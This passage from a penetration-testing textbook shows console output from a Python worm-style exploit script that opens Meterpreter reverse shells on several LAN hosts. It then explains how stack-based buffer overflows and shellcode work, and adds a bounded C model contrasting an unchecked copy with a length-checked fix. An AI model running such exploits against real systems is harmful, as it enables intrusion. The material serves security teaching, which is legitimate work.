Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers

Authors: TJ O'Connor
In the following section, we will construct our own zero-day attack.
     attacker# python conficker.py -H 192.168.1.30-50 -l 192.168.1.3 -F passwords.txt
     [+] Found Target Host: 192.168.1.35
     [+] Found Target Host: 192.168.1.37
     [+] Found Target Host: 192.168.1.42
     [+] Found Target Host: 192.168.1.45
     [+] Found Target Host: 192.168.1.47
     <..SNIPPED..>
     [*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
     [*] Attempting to trigger the vulnerability...
     [*] Sending stage (752128 bytes) to 192.168.1.37
     [*] Meterpreter session 1 opened (192.168.1.3:1337 -> 192.168.1.37:1087) at Sat Jun 23 16:25:05 -0700 2012
     <..SNIPPED..>
     [*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
     [*] Attempting to trigger the vulnerability...
     [*] Sending stage (752128 bytes) to 192.168.1.42
     [*] Meterpreter session 1 opened (192.168.1.3:1337 -> 192.168.1.42:1094) at Sat Jun 23 15:25:09 -0700 2012

Writing Your Own Zero-Day Proof of Concept Code
    The preceding section and the Conficker worm made use of a stack corruption vulnerability. While the Metasploit Framework contains over eight hundred unique exploits in its arsenal, you may encounter a time when you have to write your own remote code execution exploit. This section explains how Python can help simplify that process. In order to do so, let's begin by understanding stack-based buffer overflows.
    The Morris Worm succeeded in part because of a stack-based buffer overflow against the Finger service (US v. Morris, 1991). This class of exploits succeeds because a program fails to sanitize or validate user input. Although the Morris Worm made use of a stack-based buffer overflow attack in 1988, it was not until 1996 that Elias Levy (a.k.a. Aleph One) published the seminal paper, “Smashing the Stack for Fun and Profit,” in Phrack Magazine (One, 1996). If you are unfamiliar with how stack-based buffer overflow attacks work or would like to learn more, consider reading Elias's paper. For our purposes, we will take the time to illustrate only the key concepts behind a stack-based buffer overflow attack.
    Stack-Based Buffer Overflow Attacks
    In the case of a stack-based buffer overflow, unchecked user data overwrites the saved instruction pointer [EIP] to take control of a program's flow. The exploit directs the EIP register to a location containing shellcode inserted by the attacker. Shellcode, a series of machine code instructions, can allow the exploit to add an additional user to the target system, make a network connection with the attacker, or download a stand-alone executable. Endless shellcode possibilities exist, limited only by the size of the available space in memory.
    More Information…
Essential elements of stack-based buffer overflow exploit
    Overflow: user input that exceeds the expected value allotted in the stack.
    Return Address: The 4-byte address used to jump directly to the top of the stack. In the following exploit, we use a 4-byte address that points to a JMP ESP instruction in kernel32.dll.
    Padding: A series of NOP (no operation) instructions that precedes the shellcode, allowing an attacker to guesstimate the address location to jump to. If an attacker lands anywhere in the NOP sled, he slides directly into the shellcode.
    Shellcode: A small piece of code written in assembly machine code. In the following example, we generated the shellcode using the Metasploit Framework.
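The following C program is an added illustration of the overflow and return-address elements just listed; it is not code from the book. It models a 32-bit stack frame as a byte array laid out the way the text describes (local buffer, then saved frame pointer, then saved return address), shows how an unchecked copy of oversized input reaches the saved EIP, and places the fix beside it: a copy that validates the input length before writing. The buffer size, the addresses and the input are constructed values; the unchecked copy is clamped to the modelled frame so the demonstration itself never writes out of bounds.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Byte-level model of a 32-bit stack frame (all sizes constructed for the
 * demonstration): a fixed local buffer, then the saved frame pointer (EBP),
 * then the saved return address (EIP) that RET will pop. */
#define BUF_SIZE       16
#define SAVED_EBP_OFF  (BUF_SIZE)
#define SAVED_EIP_OFF  (BUF_SIZE + 4)
#define FRAME_SIZE     (BUF_SIZE + 8)

struct frame_model {
    unsigned char bytes[FRAME_SIZE];
};

static const uint32_t ORIGINAL_EIP = 0x08048abcu;  /* constructed return address */
static const uint32_t ORIGINAL_EBP = 0xbffff000u;  /* constructed frame pointer */

/* Lay out a fresh frame with its saved EBP and EIP in place. */
static void frame_init(struct frame_model *f)
{
    memset(f->bytes, 0, sizeof f->bytes);
    memcpy(f->bytes + SAVED_EBP_OFF, &ORIGINAL_EBP, sizeof ORIGINAL_EBP);
    memcpy(f->bytes + SAVED_EIP_OFF, &ORIGINAL_EIP, sizeof ORIGINAL_EIP);
}

/* Read back the saved return address as the CPU would on RET. */
static uint32_t frame_saved_eip(const struct frame_model *f)
{
    uint32_t v;
    memcpy(&v, f->bytes + SAVED_EIP_OFF, sizeof v);
    return v;
}

/* Unchecked copy: the defect. It behaves like strcpy(buf, input) with no
 * length validation, so bytes past BUF_SIZE land on the saved EBP and EIP.
 * The write is clamped to the model so this program stays in bounds; a real
 * strcpy would keep writing. Returns the number of bytes written. */
static size_t unchecked_copy(struct frame_model *f, const unsigned char *in, size_t len)
{
    size_t n = len < FRAME_SIZE ? len : FRAME_SIZE;
    memcpy(f->bytes, in, n);
    return n;
}

/* Checked copy: the fix. Input longer than the buffer is rejected before a
 * single byte is written, so the saved frame pointer and return address
 * stay intact. Returns 0 on success, -1 when the input is rejected. */
static int checked_copy(struct frame_model *f, const unsigned char *in, size_t len)
{
    if (len > BUF_SIZE)
        return -1;
    memcpy(f->bytes, in, len);
    return 0;
}

/* Which part of the frame an input of a given length would reach. */
enum reach { REACH_FITS, REACH_SAVED_EBP, REACH_SAVED_EIP };

static enum reach classify_length(size_t len)
{
    if (len <= BUF_SIZE)
        return REACH_FITS;
    if (len <= SAVED_EIP_OFF)
        return REACH_SAVED_EBP;
    return REACH_SAVED_EIP;
}

int main(void)
{
    struct frame_model f;
    unsigned char input[24];
    memset(input, 'A', sizeof input);   /* constructed oversized input */

    frame_init(&f);
    unchecked_copy(&f, input, sizeof input);
    printf("unchecked copy: saved EIP is now 0x%08x\n", frame_saved_eip(&f));

    frame_init(&f);
    int rc = checked_copy(&f, input, sizeof input);
    printf("checked copy:   rc=%d, saved EIP still 0x%08x\n", rc, frame_saved_eip(&f));
    return 0;
}
```

With the 16-byte buffer modelled here, 24 bytes of input are enough to replace the saved return address in the unchecked version, whereas the checked version refuses the same input and leaves the frame untouched. The classify_length helper makes the same point numerically: it reports which saved value a given input length would reach, which is the check a reviewer applies when auditing a fixed-size buffer fed from the network.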
    While many methods for writing exploits exist today, stack-based buffer overflows provided the original exploit vector, and exploits of this class remain abundant and continue to grow in number. In July of 2011, an acquaintance of mine posted an exploit for a vulnerable FTP server to Packet Storm (Freyman, 2011). Although the development of the exploit may appear to be a complex task, the actual attack contains fewer than eighty lines of code (including about thirty lines of shellcode).
    Adding the Key Elements of the
